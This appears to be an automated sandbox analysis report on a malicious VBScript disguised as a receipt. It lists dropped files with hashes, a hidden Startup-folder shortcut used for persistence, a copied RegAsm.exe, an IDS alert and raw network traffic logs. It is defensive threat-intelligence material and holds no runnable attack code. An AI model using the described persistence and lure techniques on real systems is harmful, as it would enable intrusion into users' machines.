thymallo

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	9434
Entropy (8bit):	4.9243637703272345
Encrypted:	false
SSDEEP:	192:exoe5lpOdxoe56ib49Vsm5emdagkjDt4iWN3yBGHB9smMdcU6CBdcU6Ch9smPpOU:cVib49Vkjh4iUx4cYKib4o
MD5:	EF4099FCAB6D29945272316889156337
SHA1:	5AAFAD4581D21179B892604BEBD6038792F8CBD6
SHA-256:	A86220AB1F2A5498457C8801DFCBB2FE3EA6977378CE7E3EEBD007336AFDB3BC
SHA-512:	EC9BB5508D39E6C038878F789DE84F7FBDC87CD20AE3EF81D68BC6589784ADB98EDCDEBF544A463C0AB2F01F52B743803A49A4F3A54FD3D003851B7DEEB8014C
Malicious:	false
Preview:	PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:Nlllul/w+Xz:NllU4+X
MD5:	C6327DC2AAA9E6C43AE7D50273071373
SHA1:	9A06EBB366A2FB3DBAE87612A1EEE4B7BE635E0F
SHA-256:	5D597D7C7073C095D570A207C49DBB1A003BCCB4FC4FA12663767B7E1A1C1484
SHA-512:	7D035D92CA99429D52B62E37162794E18FDA13B9AAB6FEA76A3FF5BC01DF28250D9E4AFD628544B468DF0E44B5FBD52128184B63D6DC82BE5318FA38A622AFF1
Malicious:	false
Preview:	@...e...................................o............@..........

C:\Users\user\AppData\Local\Temp\Log.tmp

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	Generic INItialization configuration [WIN]
Category:	dropped
Size (bytes):	64
Entropy (8bit):	3.6722687970803873
Encrypted:	false
SSDEEP:	3:rRSFYJKXzovNsr42VjFYJKXzovuEXn:EFYJKDoWr5FYJKDoG+n
MD5:	DE63D53293EBACE29F3F54832D739D40
SHA1:	1BC3FEF699C3C2BB7B9A9D63C7E60381263EDA7F
SHA-256:	A86BA2FC02725E4D97799A622EB68BF2FCC6167D439484624FA2666468BBFB1B
SHA-512:	10AB83C81F572DBAA99441D2BFD8EC5FF1C4BA84256ACDBD24FEB30A33498B689713EBF767500DAAAD6D188A3B9DC970CF858A6896F4381CEAC1F6A74E1603D0
Malicious:	false
Preview:	....### explorer ###..[WIN]r[WIN]....### explorer ###..r[WIN]r

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5nqjjraf.ygi.psm1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qo22wsrj.kk3.psm1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rgl0ie2x.ovk.ps1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zgnitp0j.knq.ps1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RegAsm.lnk

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat May 4 06:48:57 2024, mtime=Sat May 4 06:48:57 2024, atime=Sat May 4 06:48:57 2024, length=65440, window=hide
Category:	dropped
Size (bytes):	759
Entropy (8bit):	5.064068629756436
Encrypted:	false
SSDEEP:	12:8nkokokjg4WWC19KdY//6TKJLqQm0KD9x83zfjAPrHwzoh2EjMBmV:8k55NBkK+kKFqzD9K3APSR3Bm
MD5:	8C79DD37483628AB99560B03A802053C
SHA1:	CDE03588A9F128842507DAF94BB4E6311BCC8201
SHA-256:	3D1EFCBFD445368771635195606DBE239E2B34B33435B0B5CBE119E532EAC96F
SHA-512:	C687030032900D4ABF261E9F670ABEBBD0296539D1AA3EEB9511FE13DCCD3015F9FC6691F407EE33508C659CBA723987BF4A230E1BB16F4E70D08EF962F76D8E
Malicious:	false
Preview:	L..................F.... ....p......p......p.............................t.:..DG..Yr?.D..U..k0.&...&......vk.v.......Z...............t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.X.=...........................%..A.p.p.D.a.t.a...B.V.1......X.=..Roaming.@......CW.^.X.=..............................R.o.a.m.i.n.g.....`.2......X.> .RegAsm.exe..F......X.>.X.>.........................~`k.R.e.g.A.s.m...e.x.e.......X...............-.......W............R.Z.....C:\Users\user\AppData\Roaming\RegAsm.exe........\.....\.....\.....\.....\.R.e.g.A.s.m...e.x.e.`.......X.......927537...........hT..CrF.f4... ..T..b...,.......hT..CrF.f4... ..T..b...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

C:\Users\user\AppData\Roaming\RegAsm.exe

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	65440
Entropy (8bit):	6.049806962480652
Encrypted:	false
SSDEEP:	768:X8XcJiMjm2ieHlPyCsSuJbn8dBhFwlSMF6Iq8KSYDKbQ22qWqO8w1R:rYMaNylPYSAb8dBnsHsPDKbQBqTY
MD5:	0D5DF43AF2916F47D00C1573797C1A13
SHA1:	230AB5559E806574D26B4C20847C368ED55483B0
SHA-256:	C066AEE7AA3AA83F763EBC5541DAA266ED6C648FBFFCDE0D836A13B221BB2ADC
SHA-512:	F96CF9E1890746B12DAF839A6D0F16F062B72C1B8A40439F96583F242980F10F867720232A6FA0F7D4D7AC0A7A6143981A5A130D6417EA98B181447134C7CFE2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 7sYKxZWLgw.exe, Detection: malicious, Browse Filename: 55wj9QSq9c.exe, Detection: malicious, Browse Filename: Celery.exe, Detection: malicious, Browse Filename: qBSw7aeXEM.exe, Detection: malicious, Browse Filename: AWB NO. 077-57676135.exe, Detection: malicious, Browse Filename: z4aHc5RDMN.exe, Detection: malicious, Browse Filename: hesaphareketi-01.pdf.SCR.exe, Detection: malicious, Browse Filename: hesaphareketi_1.SCR.exe, Detection: malicious, Browse Filename: remasdasd.exe, Detection: malicious, Browse Filename: 9safSk1jJz.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0.............^.... ........@.. ....................... .......F....`.....................................O.......8................A........................................................... ............... ..H............text...d.... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B................@.......H........A...p..........T................................................~P...-.r...p.....(....(....s.....P.....0.."........(......-.r...p.rI..p(....s....z....0..........(....~P.....o........(....n(.....(..........%...(....~(.....(..........%...%...(.....(.....(..........%...%...%...(....V.(......}Q.....}R.....{Q.....{R......0...........(.......i.=...}S......i.@...}T......i.@...}U.....+m...(....o .....r]..p.o!...,..{T.......{U........o"....+(.ra..p.o!...,..{T.......

**\Device\Mup\user-PC*\MAILSLOT\NET\NETLOGON**

Process:	C:\Windows\System32\wscript.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	3.5686534414266404
Encrypted:	false
SSDEEP:	3:8IlwBl55I2Y1An20lmlLn:ry4G20ELn
MD5:	5F17A667B994C404A0D95C17EB401DB5
SHA1:	1C274EA9E9F8AC55C37F3C9865223EE538FE682A
SHA-256:	CA2F6AB076BBB2AC5B9718E6BDB9C3B1531353CF0AFF00CC80B6CDCADD0EEF13
SHA-512:	255A25DEBDAF2129A1F4E7C7CE7FBBF9E066A80E953C26BF2FDDCAAC1868CD89AB0FE692F72C6E9C08C671BEB10EC8A2FDCE3B4CA3C7500132777CE342E31495
Malicious:	false
Preview:	....9.2.7.5.3.7.....\MAILSLOT\NET\GETDCEC59E2D0.................

\Device\Mup\user-PC\PIPE\samr

Process:	C:\Windows\System32\wscript.exe
File Type:	GLS_BINARY_LSB_FIRST
Category:	dropped
Size (bytes):	160
Entropy (8bit):	4.438743916256937
Encrypted:	false
SSDEEP:	3:rmHfvtH//STGlA1yqGlYUGk+ldyHGlgZty:rmHcKtGFlqty
MD5:	E467C82627F5E1524FDB4415AF19FC73
SHA1:	B86E3AA40E9FBED0494375A702EABAF1F2E56F8E
SHA-256:	116CD35961A2345CE210751D677600AADA539A66F046811FA70E1093E01F2540
SHA-512:	2A969893CC713D6388FDC768C009055BE1B35301A811A7E313D1AEEC1F75C88CCDDCD8308017A852093B1310811E90B9DA76B6330AACCF5982437D84F553183A
Malicious:	false
Preview:	................................xW4.4.....#Eg.......]..........+.H`........xW4.4.....#Eg......3.qq..7I......6........xW4.4.....#Eg......,..l..@E............

\Device\Mup\user-PC\PIPE\wkssvc

Process:	C:\Windows\System32\wscript.exe
File Type:	GLS_BINARY_LSB_FIRST
Category:	dropped
Size (bytes):	160
Entropy (8bit):	4.577654635909331
Encrypted:	false
SSDEEP:	3:rmHfvtH//Sy3yeM1y73yeUUGk+l91F3ye0Zty:rmHcy3HL73HNGFlXF3HIty
MD5:	86EFD27334586B592E7BFBD0E143C450
SHA1:	E8D1FF64BB20235FD4AF6D8051A4CD4A19B91BDE
SHA-256:	4AA9CA41BA628CDB8E337FCD8929F6BD8D68997E120A8C925BFA1C311AD7DFB4
SHA-512:	3FA13E0456C17D061B40F512CD5615F0B46F82E2095F82C0EB4D1D3E8DAF1ECE475028EB77C78C0FF91E034B745F3FD3C1F0C5AE87FBAEB69F67B1C69F547048
Malicious:	false
Preview:	...................................k...6.3F..~4Z.....]..........+.H`...........k...6.3F..~4Z....3.qq..7I......6...........k...6.3F..~4Z....,..l..@E............

Static File Info

General

File type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Entropy (8bit):	3.4169481775422623
TrID:	Text - UTF-16 (LE) encoded (2002/1) 64.44% MP3 audio (1001/1) 32.22% Lumena CEL bitmap (63/63) 2.03% Corel Photo Paint (41/41) 1.32%
File name:	S847453-receipt.vbs
File size:	62'510 bytes
MD5:	a0ce65f17a0eaa1f7d3cadb0eac35f2f
SHA1:	5d701f3be2761fe6611b846006ecd26c3cf9c373
SHA256:	3a4477f623c5db3ae063a435ca6efe7b203e110c85bfa2d1b85110dc88f77739
SHA512:	9106b1965709957ce121030844a493ea62f7a1d178ed4bb66e321f648b6d3b32f76f996ccd51e964bc4a76d6109b4190b665717e9862a68024ed533791edbc2a
SSDEEP:	384:FZAaML00slBpw2ciAnpMuDpIRpuMkl6jM1L7Kc0ZCEXJg:7x9BpGriuDpIRgMklq9ZxZg
TLSH:	12536B526BEA2108B5FBBA48997A41344F3779C5AD7DC94E05CC291D0BF3E84CC60BA7
File Content Preview:	..'.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....'.....'. .C.o.p.y.r.i.g.h.t. .(.c.). .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n... .A.l.l. .r.i.g.h.t.s. .r

File Icon


Icon Hash:	68d69b8f86ab9a86

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/04/24-09:48:56.878657	TCP	2020425	ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 3 M1	443	49739	131.153.147.50	192.168.2.4

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 4, 2024 09:48:13.623137951 CEST	49731	443	192.168.2.4	172.67.187.200
May 4, 2024 09:48:13.623192072 CEST	443	49731	172.67.187.200	192.168.2.4
May 4, 2024 09:48:13.623275995 CEST	49731	443	192.168.2.4	172.67.187.200
May 4, 2024 09:48:13.634483099 CEST	49731	443	192.168.2.4	172.67.187.200
May 4, 2024 09:48:13.634504080 CEST	443	49731	172.67.187.200	192.168.2.4
May 4, 2024 09:48:13.971415997 CEST	443	49731	172.67.187.200	192.168.2.4
May 4, 2024 09:48:13.971510887 CEST	49731	443	192.168.2.4	172.67.187.200
May 4, 2024 09:48:14.029026985 CEST	49731	443	192.168.2.4	172.67.187.200
May 4, 2024 09:48:14.029053926 CEST	443	49731	172.67.187.200	192.168.2.4
May 4, 2024 09:48:14.029400110 CEST	443	49731	172.67.187.200	192.168.2.4
May 4, 2024 09:48:14.029458046 CEST	49731	443	192.168.2.4	172.67.187.200
May 4, 2024 09:48:14.039554119 CEST	49731	443	192.168.2.4	172.67.187.200
May 4, 2024 09:48:14.084124088 CEST	443	49731	172.67.187.200	192.168.2.4
May 4, 2024 09:48:14.685581923 CEST	443	49731	172.67.187.200	192.168.2.4
May 4, 2024 09:48:14.685651064 CEST	443	49731	172.67.187.200	192.168.2.4
May 4, 2024 09:48:14.685674906 CEST	49731	443	192.168.2.4	172.67.187.200
May 4, 2024 09:48:14.685684919 CEST	443	49731	172.67.187.200	192.168.2.4
May 4, 2024 09:48:14.685691118 CEST	49731	443	192.168.2.4	172.67.187.200
May 4, 2024 09:48:14.685693979 CEST	443	49731	172.67.187.200	192.168.2.4
May 4, 2024 09:48:14.685734034 CEST	49731	443	192.168.2.4	172.67.187.200
May 4, 2024 09:48:14.685750961 CEST	443	49731	172.67.187.200	192.168.2.4
May 4, 2024 09:48:14.685831070 CEST	443	49731	172.67.187.200	192.168.2.4
May 4, 2024 09:48:14.685861111 CEST	49731	443	192.168.2.4	172.67.187.200
May 4, 2024 09:48:14.685868979 CEST	443	49731	172.67.187.200	192.168.2.4
May 4, 2024 09:48:14.685884953 CEST	49731	443	192.168.2.4	172.67.187.200
May 4, 2024 09:48:14.685909033 CEST	49731	443	192.168.2.4	172.67.187.200
May 4, 2024 09:48:14.686270952 CEST	443	49731	172.67.187.200	192.168.2.4
May 4, 2024 09:48:14.686316967 CEST	443	49731	172.67.187.200	192.168.2.4
May 4, 2024 09:48:14.686320066 CEST	49731	443	192.168.2.4	172.67.187.200
May 4, 2024 09:48:14.686326981 CEST	443	49731	172.67.187.200	192.168.2.4
May 4, 2024 09:48:14.686355114 CEST	49731	443	192.168.2.4	172.67.187.200
May 4, 2024 09:48:14.686378002 CEST	49731	443	192.168.2.4	172.67.187.200
May 4, 2024 09:48:14.686777115 CEST	443	49731	172.67.187.200	192.168.2.4
May 4, 2024 09:48:14.686815023 CEST	49731	443	192.168.2.4	172.67.187.200
May 4, 2024 09:48:14.686821938 CEST	443	49731	172.67.187.200	192.168.2.4
May 4, 2024 09:48:14.686856031 CEST	49731	443	192.168.2.4	172.67.187.200
May 4, 2024 09:48:14.686861038 CEST	443	49731	172.67.187.200	192.168.2.4
May 4, 2024 09:48:14.686896086 CEST	49731	443	192.168.2.4	172.67.187.200
May 4, 2024 09:48:14.686899900 CEST	443	49731	172.67.187.200	192.168.2.4
May 4, 2024 09:48:14.686922073 CEST	443	49731	172.67.187.200	192.168.2.4
May 4, 2024 09:48:14.686934948 CEST	49731	443	192.168.2.4	172.67.187.200
May 4, 2024 09:48:14.686964989 CEST	49731	443	192.168.2.4	172.67.187.200
May 4, 2024 09:48:14.696067095 CEST	49731	443	192.168.2.4	172.67.187.200
May 4, 2024 09:48:14.696089029 CEST	443	49731	172.67.187.200	192.168.2.4
May 4, 2024 09:48:39.420378923 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:39.420411110 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:39.420504093 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:39.429702997 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:39.429713964 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:39.762624979 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:39.762731075 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:39.767323017 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:39.767333031 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:39.767573118 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:39.774702072 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:39.820115089 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.129213095 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.129268885 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.129303932 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.129336119 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.129369974 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.129389048 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.129415035 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.129550934 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.129618883 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.129666090 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.129674911 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.129920006 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.130517006 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.130589008 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.130621910 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.130670071 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.130676031 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.130824089 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.131314039 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.131387949 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.131421089 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.131467104 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.131474018 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.131530046 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.132261038 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.132313967 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.132373095 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.132380009 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.133222103 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.133255005 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.133282900 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.133291960 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.133297920 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.133333921 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.134054899 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.134109974 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.134156942 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.134202003 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.134210110 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.134222031 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.134973049 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.135009050 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.135051012 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.135057926 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.135113001 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.135863066 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.135962009 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.136004925 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.136035919 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.136044025 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.136837959 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.136848927 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.136858940 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.136908054 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.136919022 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.136924028 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.136986017 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.137902021 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.137979984 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.138015032 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.138035059 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.138042927 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.138101101 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.138920069 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.139034033 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.288640022 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.288784981 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.288923979 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.288975954 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.288983107 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.289083958 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.290177107 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.290231943 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.290991068 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.291100979 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.291681051 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.291747093 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.292640924 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.292706013 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.293507099 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.293560028 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.294450045 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.294482946 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.294522047 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.294522047 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.294531107 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.294558048 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.295737028 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.295799017 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.297000885 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.297096014 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.297466040 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.297525883 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.298342943 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.298480034 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.298626900 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.298717976 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.299490929 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.299540997 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.300344944 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.300404072 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.448250055 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.448410988 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.448764086 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.448801041 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.448821068 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.448829889 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.448841095 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.448867083 CEST	49737	443	192.168.2.4	104.21.45.138
May 4, 2024 09:48:40.449853897 CEST	443	49737	104.21.45.138	192.168.2.4
May 4, 2024 09:48:40.449904919 CEST	49737	443	192.168.2.4	104.21.45.138
